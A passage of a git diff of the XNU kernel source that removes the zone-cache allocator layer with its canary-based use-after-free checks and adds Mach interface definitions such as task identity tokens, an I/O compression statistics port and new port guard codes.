sizeof(vm_offset_t)); - *primary = *backup = (zcache_canary ^ (uintptr_t)element); -#else -#pragma unused(zone, element) -#endif -} - -#if ZALLOC_ENABLE_POISONING -__abortlike static void -zcache_validation_panic(zone_t zone, vm_offset_t *primary, vm_offset_t *backup, - vm_offset_t permutation) -{ - vm_offset_t primary_value = 0; - vm_offset_t backup_value = 0; - - if (permutation == zcache_canary) { - primary_value = *primary ^ (vm_offset_t)primary; - backup_value = *backup ^ (vm_offset_t)primary; - permutation = permutation ^ (vm_offset_t)primary; - } else { - primary_value = *primary; - backup_value = *backup; - } - if (primary_value != permutation) { - panic("Zone cache element was used after free! Element %p was corrupted at " - "beginning; Expected 0x%lx but found 0x%lx; canary 0x%lx; zone %p (%s%s)", - primary, (uintptr_t) permutation, (uintptr_t) *primary, zcache_canary, zone, - zone_heap_name(zone), zone->z_name); - } else { - panic("Zone cache element was used after free! Element %p was corrupted at end; " - "Expected 0x%lx but found 0x%lx; canary 0x%lx; zone %p (%s%s)", - primary, (uintptr_t) permutation, (uintptr_t) *backup, zcache_canary, zone, - zone_heap_name(zone), zone->z_name); - } -} - -/* - * zcache_validate_and_clear_canary - * - * Validates an element of the zone cache to make sure it still contains the zone - * caching canary and clears it. - * - * Parameters: - * zone zone for the element - * primary addr of canary placed in front - * backup addr of canary placed at the back - */ -static void -zcache_validate_and_clear_canary(zone_t zone, vm_offset_t *primary, vm_offset_t *backup) -{ - vm_offset_t primary_value = (*primary ^ (uintptr_t)primary); - vm_offset_t backup_value = (*backup ^ (uintptr_t)primary); - - if (primary_value == zcache_canary && backup_value == zcache_canary) { - *primary = *backup = ZONE_POISON; - } else { - zcache_validation_panic(zone, primary, backup, zcache_canary); - } -} - -/* - * zcache_validate_element - * - * Validates the first and last pointer size of the element to ensure - * that they haven't been altered. This function is used when an - * element moves from cache to zone, therefore only validing the - * first and last pointer size (location of future freelist pointers). - * - * Parameters: - * zone zone for the element - * element addr of element to validate - * poison has the element been poisoned - */ -static void -zcache_validate_element(zone_t zone, vm_offset_t *element, bool poison) -{ - vm_offset_t *primary = (vm_offset_t *)element; - vm_offset_t *backup = (vm_offset_t *)((vm_offset_t)primary + - zone_elem_size(zone) - sizeof(vm_offset_t)); - - if (zone->zfree_clear_mem) { - if (*primary == 0 && *backup == 0) { - return; - } else { - zcache_validation_panic(zone, primary, backup, 0); - } - } - - if (__probable(!poison)) { - zcache_validate_and_clear_canary(zone, primary, backup); - } else { - if (*primary == ZONE_POISON && *backup == ZONE_POISON) { - return; - } else { - zcache_validation_panic(zone, primary, backup, ZONE_POISON); - } - } -} -#endif /* ZALLOC_ENABLE_POISONING */ diff --git a/osfmk/kern/zcache_internal.h b/osfmk/kern/zcache_internal.h deleted file mode 100644 index 2cafb525c..000000000 --- a/osfmk/kern/zcache_internal.h +++ /dev/null @@ -1,206 +0,0 @@ -/* - * Copyright (c) 2017-2020 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * Below is a diagram of the caching system. This design is based of the - * paper "Magazines and Vmem: Extending the Slab Allocator to Many CPUs and - * Arbitrary Resources" by Jeff Bonwick and Jonathan Adams. It is divided into 3 - * layers: the Per-cpu Layer, the Depot Layer, and the Zone Allocator. The - * Per-CPU and Depot layers store elements using arrays we call magazines. - * - * Magazines function like a stack (we push and pop elements) and can be - * moved around for bulk operations. - * _________ _________ _________ - * | CPU 1 | | CPU 2 | | CPU 3 | - * | _ _ | | _ _ | | _ _ | - * | |#| | | | | | | |#| | | |#| |#| | Per-CPU Layer - * | |#| |_| | | |_| |#| | | |#| |#| | - * |_________| |_________| |_________| - * - * ______________________________________________ - * | _ _ _ _ _ _ | - * | |#| |#| |#| | | | | | | | Depot Layer - * | |#| |#| |#| |_| |_| |_| | - * |______________________________________________| - * - * _______________________________________________ - * | # | # | # | # | # | # | # | # | # | # | # | # | Zone Allocator - * |_______________________________________________| - * - * The top layer is the per-cpu cache and consists of a current and - * previous magazine for each CPU. The current magazine is the one we always try - * to allocate from and free to first. Only if we are unable, do we check the - * previous magazine. If the previous magazine can satisfy the allocate or free, - * then we switch the two and allocate from the new current magazine. This layer - * requires no locking, so we can access multiple CPU's caches concurrently. - * This is the main source of the speedup. - * - * We have two magazines here to prevent thrashing when swapping magazines - * with the depot layer. If a certain pattern of alloc and free are called we - * can waste a lot of time swapping magazines to and from the depot layer. We - * prevent this by dividing the per-cpu cache into two separate magazines. - * - * The middle layer is the magazine depot. This layer consists of a - * collection of full and empty magazines. These are used to reload the per-cpu - * caches when needed. This is implemented as an array of magazines which are - * initially all empty and as we fill up magazines we increment the index to - * point at the first empty magazine. Since this layer is per-zone, it allows us - * to balance the cache between cpus, but does require taking a lock. - * - * When neither the current nor previous magazine for a given CPU can - * satisfy the free or allocation, we look to the depot layer. If there are - * magazines in the depot that can satisfy the free or allocation we swap - * that magazine into the current position. In the example below, to allocate on - * the given CPU we must lock the depot layer and swap magazine A with magazine - * B and decrement the depot index. - * - * _____________________ _______________________________________ - * | Per-CPU Cache | | Depot Layer | - * | | | | - * | A___ ____ | | ____ B___ ____ ____ | - * | | | | | | | | ## | | ## | | | | | | - * | | | | | | | | ## | | ## | | | | | | - * | | | | | | | | ## | | ## | | | | | | - * | | | | | | | | ## | | ## | | | | | | - * | |____| |____| | | |_##_| |_##_| |____| |____| | - * | Current Previous | | | - * |_____________________| |_______________________________________| - * - * The bottom layer is the Zone Allocator. This is already implemented in - * XNU and will remain mostly unchanged. Implementation for this can be found - * in zalloc.c and zalloc.h. We will only use the zone if all other layers are - * unable to satisfy the allocation or free. When we do use the zone, we will - * try to allocate an entire magazine of elements or free an entire magazine of - * elements at once. - * - * Caching must be enabled explicitly, by calling zone_create() with the - * ZC_CACHING flag, for every zone you want to cache elements for. Zones - * which are good candidates for this are ones with highly contended zone locks. - * - * Some good potential candidates are kalloc.16, kalloc.48, Vm objects, VM map - * entries, ipc vouchers, and ipc ports. - * - * - * Some factors can be tuned by boot-arg: - * zcc_enable_for_zone_name name of a single zone to enable caching for - * (replace space characters with '.') - * - * zcc_magazine_element_count integer value for magazine size used for all - * zones (default 8 is used if not specified) - * - * zcc_depot_element_count integer value for how many full and empty - * magazines to store in the depot, if N specified - * depot will have N full and N empty magazines - * (default 16 used if not specified) - */ - -#ifndef _KERN_ZCACHE_H_ -#define _KERN_ZCACHE_H_ - -#include -#include /* zone_stats_t */ -#include - -#if CONFIG_ZCACHE -#pragma GCC visibility push(hidden) - -__BEGIN_DECLS - -struct zone_cache { - struct zcc_per_cpu_cache *__zpercpu zcc_pcpu; - struct zcc_depot *zcc_depot; -}; - -/** - * @function zcache_init - * - * @abstract - * Initializes all parts of the per-cpu caches for a given zone - * - * @param zone pointer to zone on which to iniitalize caching - * - */ -extern void zcache_init( - zone_t zone); - - -/** - * @function zcache_free_to_cpu_cache() - * - * @abstract - * Checks per-cpu caches to free element there if possible. - * - * @discussion - * The caller is responsible for checking that caching is enabled for zone. - * - * @param zone pointer to zone for which element comes from - * @param zstats pointer to the per-cpu statistics to maintain - * @param addr adddress of the element to free - */ -extern void zcache_free_to_cpu_cache( - zone_t zone, - zone_stats_t zstats, - vm_offset_t addr); - - -/** - * @function zcache_alloc_from_cpu_cache - * - * @abstract - * Checks per-cpu caches to allocate element from there if possible - * - * @discussion - * The caller is responsible for checking that caching is enabled for zone. - * - * @param zone pointer to zone for which element will comes from - * @param zstats pointer to the per-cpu statistics to maintain - * @param waste amount of waste of this allocation (or 0) - * - * @return pointer to usable element - */ -extern vm_offset_t zcache_alloc_from_cpu_cache( - zone_t zone, - zone_stats_t zstats, - vm_size_t waste); - -/** - * @function zcache_drain_depot - * - * @abstract - * Frees all the full magazines from the depot layer to the zone allocator - * Invoked by zone_gc() - * - * @param zone pointer to zone for which the depot layer needs to be drained - */ -extern void zcache_drain_depot( - zone_t zone); - -__END_DECLS - -#pragma GCC visibility pop -#endif /* CONFIG_ZCACHE */ -#endif /* _KERN_ZCACHE_H_ */ diff --git a/osfmk/mach/Makefile b/osfmk/mach/Makefile index 08d6d7511..516ab1443 100644 --- a/osfmk/mach/Makefile +++ b/osfmk/mach/Makefile @@ -64,7 +64,8 @@ MACH_PRIVATE_DEFS = \ sysdiagnose_notification.defs \ upl.defs \ vfs_nspace.defs \ - vm32_map.defs + vm32_map.defs \ + iocompressionstats_notification.defs # # MIG-generated headers that are traditionally used by user @@ -83,6 +84,7 @@ MIG_USHDRS = \ task_access_server.h \ telemetry_notification_server.h \ sysdiagnose_notification_server.h \ + iocompressionstats_notification_server.h \ vfs_nspace_server.h MIG_UUHDRS = \ @@ -183,6 +185,7 @@ PRIVATE_DATAFILES = \ coalition.h \ coalition_notification.defs \ fairplayd_notification.defs \ + iocompressionstats_notification.defs \ arcade_upcall.defs \ host_info.h \ ktrace_background.defs \ @@ -305,6 +308,7 @@ MIG_KUSRC = \ resource_notify_user.c \ task_access_user.c \ telemetry_notification_user.c \ + iocompressionstats_notification_user.c \ upl_user.c \ vfs_nspace_user.c \ vm_map_user.c \ diff --git a/osfmk/mach/arm/traps.h b/osfmk/mach/arm/traps.h index b81e54944..7102db369 100644 --- a/osfmk/mach/arm/traps.h +++ b/osfmk/mach/arm/traps.h @@ -30,3 +30,4 @@ #define MACH_ARM_TRAP_ABSTIME -3 #define MACH_ARM_TRAP_CONTTIME -4 + diff --git a/osfmk/mach/exception_types.h b/osfmk/mach/exception_types.h index 31ee691b7..2f9f7274d 100644 --- a/osfmk/mach/exception_types.h +++ b/osfmk/mach/exception_types.h @@ -184,6 +184,7 @@ #include #include #include +#include /* * Exported types */ @@ -199,6 +200,7 @@ typedef exception_mask_t *exception_mask_array_t; typedef exception_behavior_t *exception_behavior_array_t; typedef thread_state_flavor_t *exception_flavor_array_t; typedef mach_port_t *exception_port_array_t; +typedef ipc_info_port_t *exception_port_info_array_t; typedef mach_exception_data_type_t mach_exception_code_t; typedef mach_exception_data_type_t mach_exception_subcode_t; diff --git a/osfmk/mach/host_special_ports.h b/osfmk/mach/host_special_ports.h index d09b44b6b..75ba5e69d 100644 --- a/osfmk/mach/host_special_ports.h +++ b/osfmk/mach/host_special_ports.h @@ -108,9 +108,10 @@ #define HOST_SYSPOLICYD_PORT (22 + HOST_MAX_SPECIAL_KERNEL_PORT) #define HOST_FILECOORDINATIOND_PORT (23 + HOST_MAX_SPECIAL_KERNEL_PORT) #define HOST_FAIRPLAYD_PORT (24 + HOST_MAX_SPECIAL_KERNEL_PORT) +#define HOST_IOCOMPRESSIONSTATS_PORT (25 + HOST_MAX_SPECIAL_KERNEL_PORT) -#define HOST_MAX_SPECIAL_PORT HOST_FAIRPLAYD_PORT -/* MAX = last since rdar://35861175 */ +#define HOST_MAX_SPECIAL_PORT HOST_IOCOMPRESSIONSTATS_PORT +/* MAX = last since rdar://59872249 */ /* obsolete name */ #define HOST_CHUD_PORT HOST_LAUNCHCTL_PORT @@ -274,6 +275,13 @@ #define host_set_fairplayd_port(host, port) \ (host_set_special_port((host), HOST_FAIRPLAYD_PORT, (port))) +#define host_get_iocompressionstats_port(host, port) \ + (host_get_special_port((host), \ + HOST_LOCAL_NODE, HOST_IOCOMPRESSIONSTATS_PORT, (port))) +#define host_set_iocompressionstats_port(host, port) \ + (host_set_special_port((host), HOST_IOCOMPRESSIONSTATS_PORT, (port))) + + /* HOST_RESOURCE_NOTIFY_PORT doesn't #defines these conveniences. * All lookups go through send_resource_violation() */ diff --git a/osfmk/mach/iocompressionstats_notification.defs b/osfmk/mach/iocompressionstats_notification.defs new file mode 100644 index 000000000..a46c31473 --- /dev/null +++ b/osfmk/mach/iocompressionstats_notification.defs @@ -0,0 +1,20 @@ +/* + * Copyright (c) 2020, Apple Inc. All rights reserved. + */ + + /* + * Interface definition for the telemetry facility. + */ + +subsystem +#if KERNEL_USER + KernelUser +#endif /* KERNEL_USER */ + iocompressionstats_notification 5600; + +#include +#include + +simpleroutine iocompressionstats_notification( + RequestPort iocompressionstats_port : mach_port_t; + in flags : uint32_t); diff --git a/osfmk/mach/kern_return.h b/osfmk/mach/kern_return.h index d32182600..addc157f1 100644 --- a/osfmk/mach/kern_return.h +++ b/osfmk/mach/kern_return.h @@ -327,6 +327,14 @@ /* Denied by security policy */ +#define KERN_MISSING_KC 54 +/* The KC on which the function is operating is missing + */ + +#define KERN_INVALID_KC 55 +/* The KC on which the function is operating is invalid + */ + #define KERN_RETURN_MAX 0x100 /* Maximum return value allowable */ diff --git a/osfmk/mach/mach_traps.h b/osfmk/mach/mach_traps.h index b7a9bdd1c..7341d83d2 100644 --- a/osfmk/mach/mach_traps.h +++ b/osfmk/mach/mach_traps.h @@ -162,6 +162,11 @@ extern kern_return_t _kernelrpc_mach_vm_deallocate_trap( mach_vm_size_t size ); +extern kern_return_t task_dyld_process_info_notify_get( + mach_port_name_array_t names_addr, + natural_t *names_count_addr + ); + extern kern_return_t _kernelrpc_mach_vm_protect_trap( mach_port_name_t target, mach_vm_address_t address, @@ -662,6 +667,14 @@ struct _kernelrpc_mach_vm_deallocate_args { extern kern_return_t _kernelrpc_mach_vm_deallocate_trap( struct _kernelrpc_mach_vm_deallocate_args *args); +struct task_dyld_process_info_notify_get_trap_args { + PAD_ARG_(mach_vm_address_t, names_addr); /* 2 words */ + PAD_ARG_(mach_vm_address_t, names_count_addr); /* 2 words */ +}; /* Total: 4 */ + +extern kern_return_t task_dyld_process_info_notify_get_trap( + struct task_dyld_process_info_notify_get_trap_args *args); + struct _kernelrpc_mach_vm_protect_args { PAD_ARG_(mach_port_name_t, target); /* 1 word */ PAD_ARG_(mach_vm_address_t, address); /* 2 words */ diff --git a/osfmk/mach/mach_types.defs b/osfmk/mach/mach_types.defs index 25e03e784..8ef422d35 100644 --- a/osfmk/mach/mach_types.defs +++ b/osfmk/mach/mach_types.defs @@ -168,6 +168,14 @@ type task_read_t = mach_port_t #endif /* KERNEL_SERVER */ ; +type task_id_token_t = mach_port_t +#if KERNEL_SERVER + intran: task_id_token_t convert_port_to_task_id_token(mach_port_t) + outtran: mach_port_t convert_task_id_token_to_port(task_id_token_t) + destructor: task_id_token_release(task_id_token_t) +#endif /* KERNEL_SERVER */ + ; + type thread_t = mach_port_t #if KERNEL_SERVER intran: thread_t convert_port_to_thread(mach_port_t) @@ -578,9 +586,14 @@ type exception_behavior_t = int; type exception_handler_t = mach_port_t; +type exception_handler_info_t = struct[2] of natural_t; + type exception_handler_array_t = array[*:32] of exception_handler_t; +type exception_handler_info_array_t = + array[*:32] of exception_handler_info_t; + type exception_behavior_array_t = array[*:32] of exception_behavior_t; @@ -716,24 +729,25 @@ type dyld_kernel_process_info_t = struct[64] of MACH_MSG_TYPE_BYTE; #ifdef MACH_KERNEL_PRIVATE simport ; /* for voucher conversions */ simport ; /* for null conversion */ -simport ; /* for task/thread conversion */ -simport ; /* for host/processor/pset conversions */ +simport ; /* for task/thread conversion */ +simport ; /* for host/processor/pset conversions */ simport ; /* for lock_set and semaphore conversions */ -simport ; /* for ledger conversions */ -simport ; /* for processor conversions */ -simport ; /* for lock-set conversions */ -simport ; /* for semaphore conversions */ +simport ; /* for ledger conversions */ +simport ; /* for processor conversions */ +simport ; /* for lock-set conversions */ +simport ; /* for semaphore conversions */ simport ; /* for eventlink conversions */ simport ; /* for memory object type conversions */ -simport ; /* for vm_map conversions */ +simport ; /* for vm_map conversions */ #if CONFIG_ARCADE -simport ; /* for arcade_register conversions */ +simport ; /* for arcade_register conversions */ #endif #endif /* MACH_KERNEL_PRIVATE */ -simport ; /* pick up kernel-specific MIG things */ +simport ; /* pick up kernel-specific MIG things */ simport ; +simport ; /* for task_id_token conversions */ #endif /* KERNEL_SERVER */ import ; diff --git a/osfmk/mach/mach_types.h b/osfmk/mach/mach_types.h index bf5c680b2..70ff57875 100644 --- a/osfmk/mach/mach_types.h +++ b/osfmk/mach/mach_types.h @@ -137,6 +137,7 @@ typedef struct arcade_register *arcade_register_t; typedef struct ipc_eventlink *ipc_eventlink_t; typedef struct ipc_port *eventlink_port_pair_t[2]; typedef struct suid_cred *suid_cred_t; +typedef struct task_id_token *task_id_token_t; /* * OBSOLETE: lock_set interfaces are obsolete. @@ -203,6 +204,7 @@ typedef mach_port_t arcade_register_t; typedef mach_port_t ipc_eventlink_t; typedef mach_port_t eventlink_port_pair_t[2]; typedef mach_port_t suid_cred_t; +typedef mach_port_t task_id_token_t; #endif /* KERNEL */ @@ -226,6 +228,8 @@ typedef mach_port_t io_master_t; typedef mach_port_t UNDServerRef; typedef mach_port_t mach_eventlink_t; +typedef ipc_info_port_t exception_handler_info_t; + /* * Mig doesn't translate the components of an array. * For example, Mig won't use the thread_t translations @@ -305,6 +309,7 @@ typedef uint32_t suid_cred_uid_t; #define MACH_EVENTLINK_NULL ((mach_eventlink_t) 0) #define IPC_EVENTLINK_NULL ((ipc_eventlink_t) NULL) #define SUID_CRED_NULL ((suid_cred_t) NULL) +#define TASK_ID_TOKEN_NULL ((task_id_token_t) NULL) #else #define TASK_NULL ((task_t) 0) #define TASK_NAME_NULL ((task_name_t) 0) @@ -334,6 +339,7 @@ typedef uint32_t suid_cred_uid_t; #define MACH_EVENTLINK_NULL ((mach_eventlink_t) 0) #define IPC_EVENTLINK_NULL ((ipc_eventlink_t) 0) #define SUID_CRED_NULL ((suid_cred_t) 0) +#define TASK_ID_TOKEN_NULL ((task_id_token_t) 0) #endif /* capability strictly _DECREASING_. @@ -341,19 +347,19 @@ typedef uint32_t suid_cred_uid_t; * to be closest to the itk_lock. see task.h. */ typedef unsigned int mach_task_flavor_t; -#define TASK_FLAVOR_CONTROL 0 /* a task_t */ +#define TASK_FLAVOR_CONTROL 0 /* a task_t */ #define TASK_FLAVOR_READ 1 /* a task_read_t */ #define TASK_FLAVOR_INSPECT 2 /* a task_inspect_t */ #define TASK_FLAVOR_NAME 3 /* a task_name_t */ /* capability strictly _DECREASING_ */ typedef unsigned int mach_thread_flavor_t; -#define THREAD_FLAVOR_CONTROL 0 /* a thread_t */ +#define THREAD_FLAVOR_CONTROL 0 /* a thread_t */ #define THREAD_FLAVOR_READ 1 /* a thread_read_t */ #define THREAD_FLAVOR_INSPECT 2 /* a thread_inspect_t */ /* DEPRECATED */ -typedef natural_t ledger_item_t; +typedef natural_t ledger_item_t; #define LEDGER_ITEM_INFINITY ((ledger_item_t) (~0)) typedef int64_t ledger_amount_t; diff --git a/osfmk/mach/mach_vm.defs b/osfmk/mach/mach_vm.defs index 94f3db918..df2466fa9 100644 --- a/osfmk/mach/mach_vm.defs +++ b/osfmk/mach/mach_vm.defs @@ -509,6 +509,30 @@ routine mach_vm_page_range_query( skip; #endif +/* + * Map portion of a task's address space, {max, cur}_protection is inout. + */ +#if !defined(_MACH_VM_PUBLISH_AS_LOCAL_) +routine PREFIX(KERNEL_SERVER_SUFFIX(mach_vm_remap_new)) ( +#else +routine PREFIX(KERNEL_SERVER_SUFFIX(vm_remap_new)) ( +#endif + target_task : vm_map_t; + inout target_address : mach_vm_address_t; + size : mach_vm_size_t; + mask : mach_vm_offset_t; + flags : int; +#ifdef KERNEL_SERVER + src_tport : mach_port_t; +#else + src_task : vm_map_read_t; +#endif + src_address : mach_vm_address_t; + copy : boolean_t; + inout cur_protection : vm_prot_t; + inout max_protection : vm_prot_t; + inheritance : vm_inherit_t); + /****************************** Legacy section ***************************/ /* The following definitions are exist to provide compatibility with */ /* the legacy APIs. They are no different. We just need to produce */ diff --git a/osfmk/mach/mach_voucher.defs b/osfmk/mach/mach_voucher.defs index 3decdd8aa..3ec4e9870 100644 --- a/osfmk/mach/mach_voucher.defs +++ b/osfmk/mach/mach_voucher.defs @@ -66,7 +66,7 @@ routine mach_voucher_attr_command( /* extract a recipe array to reconstitue all the key values in a future voucher */ routine mach_voucher_debug_info( - task : ipc_space_t; + task : ipc_space_read_t; voucher_name: mach_port_name_t; out recipes : mach_voucher_attr_raw_recipe_array_t, CountInOut); diff --git a/osfmk/mach/memory_object_types.h b/osfmk/mach/memory_object_types.h index b7d4a4659..a3f35d645 100644 --- a/osfmk/mach/memory_object_types.h +++ b/osfmk/mach/memory_object_types.h @@ -79,6 +79,15 @@ #include +#if XNU_KERNEL_PRIVATE +#include +#if __LP64__ +#define MEMORY_OBJECT_HAS_REFCOUNT 1 +#else +#define MEMORY_OBJECT_HAS_REFCOUNT 0 +#endif +#endif /* XNU_KERNEL_PRIVATE */ + #define VM_64_BIT_DATA_OBJECTS typedef unsigned long long memory_object_offset_t; @@ -100,24 +109,31 @@ typedef natural_t mo_ipc_object_bits_t; struct memory_object_pager_ops; /* forward declaration */ +typedef struct vm_object *memory_object_control_t; /* - * "memory_object" and "memory_object_control" types used to be Mach ports - * in user space and can be passed as such to some kernel APIs. - * Their first field must match the "io_bits" field of a - * "struct ipc_object" to identify them as a "IKOT_MEMORY_OBJECT" and - * "IKOT_MEM_OBJ_CONTROL" respectively. + * "memory_object" used to be a Mach port in user space and could be passed + * as such to some kernel APIs. + * + * Its first field must match the "io_bits" field of a + * "struct ipc_object" to identify them as a "IKOT_MEMORY_OBJECT". */ -typedef struct memory_object { +typedef struct memory_object { mo_ipc_object_bits_t mo_ikot; /* DO NOT CHANGE */ +#if __LP64__ +#if XNU_KERNEL_PRIVATE + /* + * On LP64 there's a 4 byte hole that is perfect for a refcount. + * Expose it so that all pagers can take advantage of it. + */ + os_ref_atomic_t mo_ref; +#else + unsigned int __mo_padding; +#endif /* XNU_KERNEL_PRIVATE */ +#endif /* __LP64__ */ const struct memory_object_pager_ops *mo_pager_ops; - struct memory_object_control *mo_control; + memory_object_control_t mo_control; } *memory_object_t; -typedef struct memory_object_control { - mo_ipc_object_bits_t moc_ikot; /* DO NOT CHANGE */ - struct vm_object *moc_object; -} *memory_object_control_t; - typedef const struct memory_object_pager_ops { void (*memory_object_reference)( memory_object_t mem_obj); @@ -177,6 +193,11 @@ typedef const struct memory_object_pager_ops { #else /* KERNEL_PRIVATE */ typedef mach_port_t memory_object_t; +/* + * vestigial, maintained for source compatibility, + * no MIG interface will accept or return non NULL + * objects for those. + */ typedef mach_port_t memory_object_control_t; #endif /* KERNEL_PRIVATE */ @@ -441,10 +462,8 @@ typedef struct memory_object_attr_info memory_object_attr_info_data_t; #define MAX_UPL_TRANSFER_BYTES (1024 * 1024) #define MAX_UPL_SIZE_BYTES (1024 * 1024 * 64) -#ifndef CONFIG_EMBEDDED #define MAX_UPL_SIZE (MAX_UPL_SIZE_BYTES / PAGE_SIZE) #define MAX_UPL_TRANSFER (MAX_UPL_TRANSFER_BYTES / PAGE_SIZE) -#endif struct upl_page_info { ppnum_t phys_addr; /* physical page index number */ diff --git a/osfmk/mach/port.h b/osfmk/mach/port.h index a70035edd..9472cecea 100644 --- a/osfmk/mach/port.h +++ b/osfmk/mach/port.h @@ -142,8 +142,13 @@ typedef struct ipc_port *ipc_port_t; #define IPC_PORT_NULL ((ipc_port_t) NULL) #define IPC_PORT_DEAD ((ipc_port_t)~0UL) -#define IPC_PORT_VALID(port) \ - ((port) != IPC_PORT_NULL && (port) != IPC_PORT_DEAD) +#define IPC_PORT_VALID(port) ipc_port_valid(port) + +static inline boolean_t +ipc_port_valid(ipc_port_t port) +{ + return port != IPC_PORT_DEAD && port; +} typedef ipc_port_t mach_port_t; @@ -269,7 +274,6 @@ typedef mach_port_type_t *mach_port_type_array_t; #define MACH_PORT_TYPE_DEAD_NAME MACH_PORT_TYPE(MACH_PORT_RIGHT_DEAD_NAME) #define MACH_PORT_TYPE_LABELH MACH_PORT_TYPE(MACH_PORT_RIGHT_LABELH) /* obsolete */ - #ifdef MACH_KERNEL_PRIVATE /* Holder used to have a receive right - remembered to filter exceptions */ #define MACH_PORT_TYPE_EX_RECEIVE MACH_PORT_TYPE_LABELH @@ -451,9 +455,16 @@ enum mach_port_guard_exception_codes { kGUARD_EXC_SEND_INVALID_RIGHT = 1u << 18, kGUARD_EXC_RCV_INVALID_NAME = 1u << 19, kGUARD_EXC_RCV_GUARDED_DESC = 1u << 20, /* should never be fatal; for development only */ + kGUARD_EXC_MOD_REFS_NON_FATAL = 1u << 21, + kGUARD_EXC_IMMOVABLE_NON_FATAL = 1u << 22, }; -#define MAX_FATAL_kGUARD_EXC_CODE (1u << 6) +#define MAX_FATAL_kGUARD_EXC_CODE (1u << 7) + +/* + * Mach port guard flags. + */ +#define MPG_FLAGS_NONE (0x00ull) /* * These flags are used as bits in the subcode of kGUARD_EXC_STRICT_REPLY exceptions. @@ -465,6 +476,16 @@ enum mach_port_guard_exception_codes { #define MPG_FLAGS_STRICT_REPLY_MISMATCHED_PERSONA (0x10ull << 56) #define MPG_FLAGS_STRICT_REPLY_MASK (0xffull << 56) +/* + * These flags are used as bits in the subcode of kGUARD_EXC_MOD_REFS exceptions. + */ +#define MPG_FLAGS_MOD_REFS_PINNED_DEALLOC (0x01ull << 56) + +/* + * These flags are used as bits in the subcode of kGUARD_EXC_IMMOVABLE exceptions. + */ +#define MPG_FLAGS_IMMOVABLE_PINNED (0x01ull << 56) + /* * Flags for mach_port_guard_with_flags. These flags extend * the attributes associated with a guarded port. diff --git a/osfmk/mach/syscall_sw.h b/osfmk/mach/syscall_sw.h index dd9bd8404..727190581 100644 --- a/osfmk/mach/syscall_sw.h +++ b/osfmk/mach/syscall_sw.h @@ -86,6 +86,7 @@ kernel_trap(_kernelrpc_mach_vm_allocate_trap,-10,5) /* 4 args, +1 for mach_vm_size_t */ kernel_trap(_kernelrpc_mach_vm_purgable_control_trap,-11,5) /* 4 args, +1 for mach_vm_offset_t */ kernel_trap(_kernelrpc_mach_vm_deallocate_trap,-12,5) /* 3 args, +2 for mach_vm_size_t and mach_vm_address_t */ +kernel_trap(task_dyld_process_info_notify_get,-13,4) /* 2 args, +2 for mach_vm_address_t */ kernel_trap(_kernelrpc_mach_vm_protect_trap,-14,7) /* 5 args, +2 for mach_vm_address_t and mach_vm_size_t */ kernel_trap(_kernelrpc_mach_vm_map_trap,-15,9) kernel_trap(_kernelrpc_mach_port_allocate_trap,-16,3) diff --git a/osfmk/mach/task.defs b/osfmk/mach/task.defs index 9e82450c7..fb6beab76 100644 --- a/osfmk/mach/task.defs +++ b/osfmk/mach/task.defs @@ -72,6 +72,12 @@ subsystem #include #include +#if !KERNEL && !LIBSYSCALL_INTERFACE +#define PREFIX(NAME) _kernelrpc_ ## NAME +#else +#define PREFIX(NAME) NAME +#endif + /* * Create a new task with an empty set of IPC rights, * and having an address space constructed from the @@ -153,7 +159,7 @@ routine task_set_info( * count for that task is non-zero. */ routine task_suspend( - target_task : task_t); + target_task : task_read_t); /* @@ -163,7 +169,7 @@ routine task_suspend( * that also have non-zero suspend counts may execute. */ routine task_resume( - target_task : task_t); + target_task : task_read_t); /* * Returns the current value of the selected special port @@ -266,7 +272,7 @@ routine task_swap_exception_ports( behavior : exception_behavior_t; new_flavor : thread_state_flavor_t; out masks : exception_mask_array_t; - out old_handlerss : exception_handler_array_t, SameCount; + out old_handlers : exception_handler_array_t, SameCount; out old_behaviors : exception_behavior_array_t, SameCount; out old_flavors : exception_flavor_array_t, SameCount); @@ -455,7 +461,7 @@ routine task_set_phys_footprint_limit( out old_limit : int); routine task_suspend2( - target_task : task_t; + target_task : task_read_t; out suspend_token : task_suspension_token_t); routine task_resume2( @@ -480,7 +486,7 @@ routine task_swap_mach_voucher( inout old_voucher : ipc_voucher_t); routine task_generate_corpse( - task :task_t; + task :task_read_t; out corpse_task_port:mach_port_t); routine task_map_corpse_info( @@ -540,5 +546,39 @@ routine task_create_suid_cred( uid : suid_cred_uid_t; out delegation : suid_cred_t); +#if KERNEL || (!KERNEL && !LIBSYSCALL_INTERFACE) +routine PREFIX(mach_task_is_self)( + task : task_name_t; + out is_self : boolean_t); +#else + /* Do not generate header, use the one in mach_init.h */ + skip; +#endif + +routine task_dyld_process_info_notify_register( + target_task : task_read_t; + notify : mach_port_make_send_t); + +routine task_create_identity_token( + task : task_t; + out token : task_id_token_t); + +routine task_identity_token_get_task_port( + token : task_id_token_t; + flavor : task_flavor_t; + out task_port: mach_port_t); + +routine task_dyld_process_info_notify_deregister( + target_task : task_read_t; + notify : mach_port_name_t); + +routine task_get_exception_ports_info( + port : mach_port_t; + exception_mask : exception_mask_t; + out masks : exception_mask_array_t; + out old_handlers_info : exception_handler_info_array_t, SameCount; + out old_behaviors : exception_behavior_array_t, SameCount; + out old_flavors : exception_flavor_array_t, SameCount); + /* vim: set ft=c : */ diff --git a/osfmk/mach/task_access.defs b/osfmk/mach/task_access.defs index 1696fd3cf..8974f5dd6 100644 --- a/osfmk/mach/task_access.defs +++ b/osfmk/mach/task_access.defs @@ -56,4 +56,12 @@ routine find_code_signature( task_access_port : mach_port_t; new_pid : int32_t); +routine check_task_access_with_flavor( + task_access_port : mach_port_t; 